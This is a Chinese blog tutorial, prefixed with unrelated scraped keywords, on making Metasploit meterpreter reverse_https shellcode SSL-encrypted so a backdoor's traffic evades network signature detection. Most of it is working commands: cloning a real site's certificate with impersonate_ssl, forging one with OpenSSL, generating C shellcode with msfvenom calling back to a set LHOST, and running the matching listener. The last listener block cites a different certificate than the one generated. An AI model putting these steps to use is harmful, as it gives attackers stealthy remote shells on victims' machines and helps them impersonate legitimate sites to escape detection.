创业网站怎么做的,网站文件命名,甘肃启航网络科技有限公司,iis 新建网站 没有注册类别在本节中#xff0c;我们将介绍如何通过使用Metasploit生成加密载荷#xff0c;以隐藏网络特征。前一章节我们已经通过Metasploit生成了一段明文的ShellCode#xff0c;但明文的网络传输存在安全隐患#xff0c;因此本节将介绍如何通过生成SSL证书来加密ShellCode#xff…在本节中我们将介绍如何通过使用Metasploit生成加密载荷以隐藏网络特征。前一章节我们已经通过Metasploit生成了一段明文的ShellCode但明文的网络传输存在安全隐患因此本节将介绍如何通过生成SSL证书来加密ShellCode使得网络特征得到隐藏从而提高后门的生存能力和抵抗网络特征分析的能力。
ShellCode 网络特征加密我们采用的是SSLSecure Sockets Layer现已被替换为TLSTransport Layer SecuritySSL是一种用于在Web上传输数据的安全协议。它的主要目的是确保在互联网上传输的数据在传递过程中不会被第三方窃取或篡改。SSL加密的原理是通过两个公钥和一个私钥来加密数据。公钥用于加密数据私钥用于解密数据。在传输过程中发送者使用接收者的公钥对数据进行加密接收者使用自己的私钥对数据进行解密。这样即使在网络上被窃取数据也无法被第三方解密从而保证了数据的安全性。
通常SSL证书由以下几部分组成
证书主体证明证书拥有者的信息如域名、组织名称等。公钥用于加密数据的公钥。私钥用于解密数据的私钥需要在安全的环境中保存。签名证明证书内容是由可信任的证书颁发机构签发的。有效期证明证书的有效期在该期限内有效。颁发者证明证书的颁发者如VeriSign、GoDaddy等。
1.3.1 通过MSF模块克隆证书
要想实现加密通常我们需要获取一个专属的证书文件获取证书的方式有两种第一种方式是通过Impersonate_SSL模块对已有证书进行下载操作如下命令实现了将www.lyshark.com网站中的证书下载到本地的功能
msf6 use auxiliary/gather/impersonate_ssl
msf6 set rhost www.lyshark.com
msf6 run当读者执行命令后则该证书将被下载到home/lyshark/.msf4/loot/目录下其中包含了证书的key,crt,pem等文件输出如下图所示 当具备了克隆证书后读者可在Metasploit中交互式执行如下命令实现生成带有加密功能的ShellCode代码如下代码中通过HANDLERSSLCERT指定证书位置并通过generate生成C语言版ShellCode代码。
msf6 use payload/windows/meterpreter/reverse_https
msf6 set STAGERVERIFYSSLCERT true
msf6 set HANDLERSSLCERT /home/lyshark/.msf4/loot/20230407144733_default_59.110.117.109_59.110.117.109_p_764545.pem
msf6 set LHOST 192.168.9.135
msf6 set lport 8443
msf6 generate -f c而对于服务端来说在传递参数时读者同样需要在HANDLERSSLCERT中传递私有证书
msf6 use exploit/multi/handler
msf6 set payload windows/meterpreter/reverse_https
msf6 set HANDLERSSLCERT /home/lyshark/.msf4/loot/20230407144733_default_59.110.117.109_59.110.117.109_p_764545.pem
msf6 set STAGERVERIFYSSLCERT true
msf6 set LPORT 8443
msf6 set LHOST 192.168.140.128
msf6 run -j1.3.2 通过OpenSSL制作证书
当然读者也可用通过kali系统内自带的openssl命令生成一个新的伪造证书OpenSSL是一个开源的安全工具用于实现SSL/TLS协议。它提供了一系列命令行工具可以用于生成证书、加密数据、解密数据等操作。
首先使用第一种方式生成下面是各个参数的详细解释
req指定生成证书请求。new指定生成一个新的证书请求。newkey rsa:4096指定生成的证书的密钥长度为4096位。days 365指定证书的有效期为365天。nodes指定不加密私钥。x509指定生成的证书类型为X.509证书。subj “/CUK/STLondon/LLondon/ODevelopment/CNwww.lyshark.com”指定证书主题信息其中CUK代表国家STLondon代表省份LLondon代表城市ODevelopment代表组织CNwww.lyshark.com代表通用名称。keyout www.lyshark.com.key指定输出的私钥文件名。out www.lyshark.com.crt指定输出的证书文件名。
通过这条命令可以生成一个有效期为365天密钥长度为4096位的X.509证书证书主题信息为/CUK/STLondon/LLondon/ODevelopment/CNwww.lyshark.com私钥文件名为www.lyshark.com.key证书文件名为www.lyshark.com.crt。
┌──(lyshark㉿kali)-[~/lyshark]
└─$ openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj \
/CUK/STLondon/LLondon/ODevelopment/CNwww.lyshark.com \
-keyout www.lyshark.com.key -out www.lyshark.com.crt┌──(lyshark㉿kali)-[~/lyshark]
└─$ cat www.lyshark.com.key www.lyshark.com.crt www.lyshark.com.pem接着读者可执行msfvenom命令通过非交互方式生成一段加密版的ShellCode代码片段。
┌──(lyshark㉿kali)-[~/lyshark]
└─$ msfvenom -p windows/meterpreter/reverse_https LHOST192.168.9.135 LPORT8443 \
PayloadUUIDTrackingtrue PayloadUUIDNameWhoamishell \
HandlerSSLCert/root/test/www.lyshark.com.pem \
StagerVerifySSLCerttrue -f c -o /root/test.c服务端启用侦听模式并通过HandlerSSLCert传入同样的证书私钥即可。
msf6 use exploit/multi/handler
msf6 set payload windows/meterpreter/reverse_https
msf6 set LHOST 192.168.9.135
msf6 set LPORT 8443
msf6 set HandlerSSLCert /root/test/www.baidu.com.pem
msf6 set StagerVerifySSLCert true
msf6 exploit -j -z本文作者 王瑞 本文链接 https://www.lyshark.com/post/4f8ecc9a.html 版权声明 本博客所有文章除特别声明外均采用 BY-NC-SA 许可协议。转载请注明出处